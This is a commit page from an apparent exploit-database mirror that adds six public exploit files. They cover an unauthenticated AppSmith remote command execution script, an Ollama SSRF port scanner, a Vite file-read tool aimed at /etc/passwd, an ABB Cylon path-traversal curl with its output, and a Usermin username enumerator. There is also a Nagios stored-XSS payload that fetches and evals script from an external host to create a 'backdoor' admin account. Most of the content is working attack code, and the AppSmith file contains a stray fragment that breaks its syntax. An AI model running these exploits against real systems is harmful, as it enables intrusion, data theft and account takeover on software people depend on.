bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-05 00:01:12 +00:00
commit 9d894f7173
10 changed files with 930 additions and 70 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

409
exploits/java/webapps/52118.py Executable file
View file

@ -0,0 +1,409 @@
# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE)
# Original Author: Rhino Security Labs
# Exploit Author: Nishanth Anand
# Exploit Date: April 2, 2025
# Vendor Homepage: https://www.appsmith.com/
# Software Link: https://github.com/appsmithorg/appsmith
# Version: Prior to v1.52
# Tested Versions: v1.47
# CVE ID: CVE-2024-55963
# Vulnerability Type: Remote Code Execution
# Description: Unauthenticated remote code execution in Appsmith versions prior to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM PROGRAM command execution.
# Proof of Concept: Yes
# Categories: Web Application, Remote Code Execution, Database
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes: The vulnerability exists in Appsmith's internal PostgreSQL database configuration, allowing attackers to execute arbitrary commands on the host system.
import requests
import json
import pyfiglet
import argparse
# Create a banner using pyfiglet
banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title
print(banner)
# Set up argument parser
parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept')
parser.add_argument('-u', '--url', required=True, help='Base URL of the target')
parser.add_argument('command', nargs='?', default='id', help='Command to execute')
args = parser.parse_args()
# Get the base URL and command from the parsed arguments
base_url = args.url
command_arg = args.command
if not base_url.startswith("http://") and not base_url.startswith("https://"):
base_url = "http://" + base_url
# Signup request
signup_url = f"{base_url}/api/v1/users"
signup_data = {
"email": "poc1@poc.com",
"password": "Testing123!"
}
print('Signing up...')
signup_response = requests.post(signup_url, data=signup_data)
signup_response.raise_for_status()
# Login request
login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed
login_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/user/login",
"Cookie": "ajs_user_id=e471142002a6163a3beff6ee71606ea55d631c49e566f403b0614af905ae951d; intercom-device-id-y10e7138=83f9c6a5-3c0b-409e-9d7b-9ca61a129f49; SESSION=1e786474-3b33-407d-be71-47d986031a24; ajs_anonymous_id=8e91142e-ea5a-4725-91b6-439e8bd0abc1; intercom-session-y10e7138=bHI4SnhSRFhmUUVLUXpGZ0V0R0lzUkZsSmxEQkFJKzRaV20wMGtnaGtJWjJoc1AySWV6Rnl2c1AvbUY4eEkxaC0tK1pqNHNKYlZxVzBib1F3NVhXK0poQT09--0daa2198fe17122d3291b90abdb3e78d193ad2ed",
}
login_data = {
"username": "poc1@poc.com", # Adjusted to match the provided request
"password": "Testing123!"
}
# Make the login request without following redirects
print('Logging in...')
login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False)
login_response.raise_for_status()
# Capture the 'Set-Cookie' header if it exists
set_cookie = login_response.headers.get('Set-Cookie')
if set_cookie:
# Split the Set-Cookie header to get the cookie name and value
cookie_name, cookie_value = set_cookie.split(';')[0].split('=')
# Fourth request to create a new workspace
print('Creating a new workspace...')
if set_cookie:
fourth_request_url = f"{base_url}/api/v1/workspaces"
fourth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"Connection": "keep-alive",
"Referer": f"{base_url}/applications",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
fourth_request_data = json.dumps({"name": "Untitled workspace 3"})
fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data)
fourth_response.raise_for_status()
# Extract the 'id' from the response if it exists
try:
response_json = fourth_response.json()
workspace_id = response_json.get("data", {}).get("id")
except ValueError:
print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging
if workspace_id:
fifth_request_url = f"{base_url}/api/v1/applications"
fifth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"Content-Length": "161",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/applications?workspaceId={workspace_id}",
"Cookie": f"{cookie_name}={cookie_value}",
}
fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None})
print('Creating a new application...')
fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data)
fifth_response.raise_for_status()
try:
response_json = fifth_response.json()
application_id = response_json.get("data", {}).get("id")
except ValueError:
print("Response content is not valid JSON:", fifth_response.text)
# Sixth request to get workspace details
if workspace_id:
sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}"
sixth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit",
"Cookie": f"{cookie_name}={cookie_value}",
}
print('Getting workspace details...')
sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers)
sixth_response.raise_for_status()
# Extract all plugin IDs from the response
try:
response_json = sixth_response.json()
plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])]
# Loop through each plugin ID for the seventh request
print(f'Searching for vulnerable postgres database...')
for plugin_id in plugin_ids:
# Seventh request to get the form data for the plugin
seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form"
seventh_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasources/NEW",
"Cookie": f"{cookie_name}={cookie_value}",
}
try:
seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers)
seventh_response.raise_for_status()
# Extracting the port value from the seventh response
try:
seventh_response_json = seventh_response.json()
if 'data' in seventh_response_json and 'form' in seventh_response_json['data']:
form_data = seventh_response_json['data']['form']
if any("postgres" in str(item) for item in form_data):
print(f"Vulnerable postgres database found.")
break
else:
pass
except (ValueError, IndexError) as e:
pass
except requests.exceptions.HTTPError as e:
print(f"Error checking plugin {plugin_id}: {e}")
continue
# Proceed to request 8 after finding "postgres"
# Proceed to request 8 after finding "postgres"
if "postgres" in str(seventh_response_json):
try:
# Try the environments API endpoint
eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true"
eighth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit",
"Cookie": f"{cookie_name}={cookie_value}",
}
print('Getting the workspace details...')
eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers)
eighth_response.raise_for_status()
# Extracting the workspace ID from the eighth response
try:
eighth_response_json = eighth_response.json()
workspace_data = eighth_response_json.get("data", [{}])[0]
workspace_id_value = workspace_data.get("id")
except (ValueError, IndexError):
print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text)
except requests.exceptions.HTTPError as e:
# If the environments API fails, use the workspace ID we already have
print(f"Could not fetch environment details: {e}")
print("Using existing workspace ID for datasource creation...")
workspace_id_value = workspace_id
except (ValueError, IndexError):
print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text)
# After the eighth request to get workspace details
if workspace_id_value:
ninth_request_url = f"{base_url}/api/v1/datasources"
ninth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195",
"Cookie": f"{cookie_name}={cookie_value}",
}
ninth_request_data = {
"pluginId": plugin_id,
"datasourceStorages": {
workspace_id_value: {
"datasourceConfiguration": {
"properties": [None, {"key": "Connection method", "value": "STANDARD"}],
"connection": {
"mode": "READ_WRITE",
"ssl": {"authType": "DEFAULT"}
},
"endpoints": [{"port": "5432", "host": "localhost"}],
"sshProxy": {"endpoints": [{"port": "22"}]},
"authentication": {
"databaseName": "postgres",
"username": "postgres",
"password": "postgres"
}
},
"datasourceId": "",
"environmentId": workspace_id_value,
"isConfigured": True
}
},
"name": "Untitled datasource 1",
"workspaceId": workspace_id
}
print('Connecting to vulnerable postgres database...')
ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data)
ninth_response.raise_for_status()
# Extracting the ID from the response
try:
ninth_response_json = ninth_response.json()
datasource_id = ninth_response_json.get("data", {}).get("id")
except (ValueError, KeyError):
print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text)
# After the ninth request to create the datasource
if datasource_id:
# 10th Request
tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview"
tenth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}",
}
tenth_request_data = {
"title": "SELECT",
"body": "create table poc (column1 TEXT);",
"suggested": True
}
print("Creating the table 'poc'...")
tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data)
tenth_response.raise_for_status()
# 11th Request
eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview"
eleventh_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2",
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}",
}
eleventh_request_data = {
"title": "SELECT",
"body": f"copy poc from program '{command_arg}';",
"suggested": True
}/CVE-2024-55963-Appsmith-RCE
print("Running command...")
eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data)
eleventh_response.raise_for_status()
# 12th Request
twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id
twelfth_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
# Request body for the 12th schema preview
twelfth_request_data = {
"title": "SELECT",
"body": "select * from poc;",
"suggested": True
}
# Print statement before the 12th request
print("Reading command output from poc table...\n")
# Make the POST request for the 12th schema preview
twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data)
# Extracting and printing the response from the 12th schema preview
try:
twelfth_response_json = twelfth_response.json()
# Extracting the specific data
body_data = twelfth_response_json.get("data", {}).get("body", [])
column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values
print("Command output:")
print("----------------------------------------")
for value in column1_values:
print(value) # Print each column1 value
print("----------------------------------------\n")
except (ValueError, KeyError):
print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging
# Cleanup Request
cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id
cleanup_request_headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
"X-Requested-By": "Appsmith",
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID
"Origin": base_url,
"Connection": "keep-alive",
"Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3",
"Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie
}
# Request body for cleanup
cleanup_request_data = {
"title": "SELECT",
"body": "DROP TABLE poc;", # Command to drop the table
"suggested": True
}
# Make the POST request for the cleanup
print('\nDropping the table...')
cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data)

63
exploits/multiple/local/52116.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: ollama 0.6.4 - SSRF
# Date: 2025-04-03
# Exploit Author: sud0
# Vendor Homepage: https://ollama.com/
# Software Link: https://github.com/ollama/ollama/releases
# Version: <=0.6.4
# Tested on: CentOS 8
import argparse
import requests
import json
from urllib.parse import urljoin
def check_port(api_base, ip, port):
api_endpoint = api_base.rstrip('/') + '/api/create'
model_path = "mynp/model:1.1"
target_url = f"https://{ip}:{port}/{model_path}"
payload = {
"model": "mario",
"from": target_url,
"system": "You are Mario from Super Mario Bros."
}
try:
response = requests.post(api_endpoint, json=payload, timeout=10, stream=True)
response.raise_for_status()
for line in response.iter_lines():
if line:
try:
json_data = json.loads(line.decode('utf-8'))
if "error" in json_data and "pull model manifest" in json_data["error"]:
error_msg = json_data["error"]
model_path_list = model_path.split(":", 2)
model_path_prefix = model_path_list[0]
model_path_suffix = model_path_list[1]
model_path_with_manifests = f"{model_path_prefix}/manifests/{model_path_suffix}"
if model_path_with_manifests in error_msg:
path_start = error_msg.find(model_path_with_manifests)
result = error_msg[path_start+len(model_path_with_manifests)+3:] if path_start != -1 else ""
print(f"Raw Response: {result}")
if "connection refused" in error_msg.lower():
print(f"[!] Port Closed - {ip}:{port}")
else:
print(f"[+] Port Maybe Open - {ip}:{port}")
return
except json.JSONDecodeError:
continue
print(f"[?] Unkown Status - {ip}:{port}")
except requests.exceptions.RequestException as e:
print(f"[x] Execute failed: {str(e)}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ollama ssrf - port scan")
parser.add_argument("--api", required=True, help="Ollama api url")
parser.add_argument("-i", "--ip", required=True, help="target ip")
parser.add_argument("-p", "--port", required=True, type=int, help="target port")
args = parser.parse_args()
check_port(args.api, args.ip, args.port)

77
exploits/multiple/remote/52111.py Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Vite Arbitrary File Read - CVE-2025-30208
# Date: 2025-04-03
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://vitejs.dev/
# Software Link: https://github.com/vitejs/vite
# Version: <= 6.2.2, <= 6.1.1, <= 6.0.11, <= 5.4.14, <= 4.5.9
# Tested on: Ubuntu
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-30208
# https://github.com/advisories/GHSA-x574-m823-4x7w
# CVE : CVE-2025-30208
"""
################
# Description #
################
Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
"""
import requests
import argparse
import urllib3
from colorama import Fore, Style
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_vulnerability(target, file_path, verbose=False, output=None):
url = f"{target}{file_path}?raw"
print(f"{Fore.CYAN}[*] Testing: {url}{Style.RESET_ALL}")
try:
response = requests.get(url, timeout=5, verify=False) # Ignore SSL verification
if response.status_code == 200 and response.text:
vuln_message = f"{Fore.GREEN}[+] Vulnerable : {url}{Style.RESET_ALL}"
print(vuln_message)
if verbose:
print(f"\n{Fore.YELLOW}--- File Content Start ---{Style.RESET_ALL}")
print(response.text[:500]) # Print first 500 characters for safety
print(f"{Fore.YELLOW}--- File Content End ---{Style.RESET_ALL}\n")
if output:
with open(output, 'a') as f:
f.write(f"{url}\n")
else:
print(f"{Fore.RED}[-] Not vulnerable or file does not exist: {url}{Style.RESET_ALL}")
except requests.exceptions.RequestException as e:
print(f"{Fore.YELLOW}[!] Error testing {url}: {e}{Style.RESET_ALL}")
def check_multiple_domains(file_path, file_to_read, verbose, output):
try:
with open(file_to_read, 'r') as file:
domains = file.readlines()
for domain in domains:
domain = domain.strip()
if domain:
check_vulnerability(domain, file_path, verbose, output)
except FileNotFoundError:
print(f"{Fore.RED}[!] Error: The file '{file_to_read}' does not exist.{Style.RESET_ALL}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="PoC for CVE-2025-30208 - Vite Arbitrary File Read")
parser.add_argument("target", nargs="?", help="Target URL (e.g., http://localhost:5173)")
parser.add_argument("-l", "--list", help="File containing list of domains")
parser.add_argument("-f", "--file", default="/etc/passwd", help="File path to read (default: /etc/passwd)")
parser.add_argument("-v", "--verbose", action="store_true", help="Show file content if vulnerable")
parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs")
args = parser.parse_args()
if args.list:
check_multiple_domains(args.file, args.list, args.verbose, args.output)
elif args.target:
check_vulnerability(args.target, args.file, verbose=args.verbose, output=args.output)
else:
print(f"{Fore.RED}Please provide a target URL or a domain list file.{Style.RESET_ALL}")

106
exploits/multiple/webapps/52115.NA Normal file
View file

@ -0,0 +1,106 @@
ABB Cylon Aspect 3.07.02 (downloadDb.php) Authenticated File Disclosure
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.07.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The building management system suffers from an authenticated arbitrary
file disclosure vulnerability. Input passed through the 'file' GET parameter
through the 'downloadDb.php' script is not properly verified before being used
to download database files. This can be exploited to disclose the contents of
arbitrary and sensitive files via directory traversal attacks.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5831
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \
> -H "Cookie: PHPSESSID=xxx"
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
sshd:x:995:992::/var/run/sshd:/bin/false
xuser:x:1000:1000::/home/xuser:
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
mysql:x:993:65534::/var/mysql:
aamtech:x:500:500::/home/aamtech:/bin/sh

74
exploits/multiple/webapps/52117.md Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: Stored XSS Vulnerability in Nagios Log Server (Privilege Escalation to Admin)
# Date: 2025-04-02
# Exploit Author: Seth Kraft
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-79, CWE-352, CWE-285, CWE-269, CWE-602
# CVSS: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:R/S:C/VC:H/VI:H/VA:H)
# Type: Stored Cross-Site Scripting (XSS), Privilege Escalation
# Exploit Risk: Critical
# Disclosure
For research and authorized testing only. Do not use against systems without permission.
# Description:
A stored XSS vulnerability in Nagios Log Server 2024R1.3.1 allows a low-privileged user to inject
malicious JavaScript into the 'email' field of their profile. When an administrator views the audit logs,
the script executes, resulting in privilege escalation via unauthorized admin account creation.
The vulnerability can be chained to achieve remote code execution (RCE) in certain configurations.
# PoC
1. Log in as a standard (non-admin) user.
2. Navigate to the profile update endpoint:
http://<target-ip>/nagioslogserver/profile/update
3. Inject the following payload into the email field:
```javascript
<script>
fetch("https://<EXTERNAL-HOST>/xss.js")
.then(response => response.text())
.then(scriptText => eval(scriptText))
.catch(console.error);
</script>
```
4. Host the xss.js payload on your external server with the following content:
```javascript
(function() {
var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/);
if (!csrfTokenMatch) return;
var csrfToken = encodeURIComponent(csrfTokenMatch[1]);
var requestBody = "csrf_ls=" + csrfToken +
"&name=backdoor" +
"&email=hacker@example.com" +
"&username=backdoor" +
"&password=Password123!" +
"&password2=Password123!" +
"&auth_type=admin" +
"&apiaccess=1" +
"&language=en_US" +
"&account_type=local";
fetch("http://<target-ip>/nagioslogserver/admin/users/create", {
method: "POST",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: requestBody
})
.then(response => response.text())
.then(console.log)
.catch(console.error);
})();
```
5. Wait for an administrator to view the audit logs. The JavaScript will execute, creating a new admin account:
Username: backdoor
Password: Password123!

54
exploits/perl/webapps/52114.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
args = parser.parse_args()
if len(sys.argv) != 5:
print("Please provide the -u for URL and -w for the wordlist containing the usernames")
print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
exit()
usernameFile = open(args.wordlist_users, 'r')
dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()
for i in usernameFileIntoList:
newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
if "Failed to change password: The current password is incorrect." in response.text:
print("Possible user found with username: " + i)
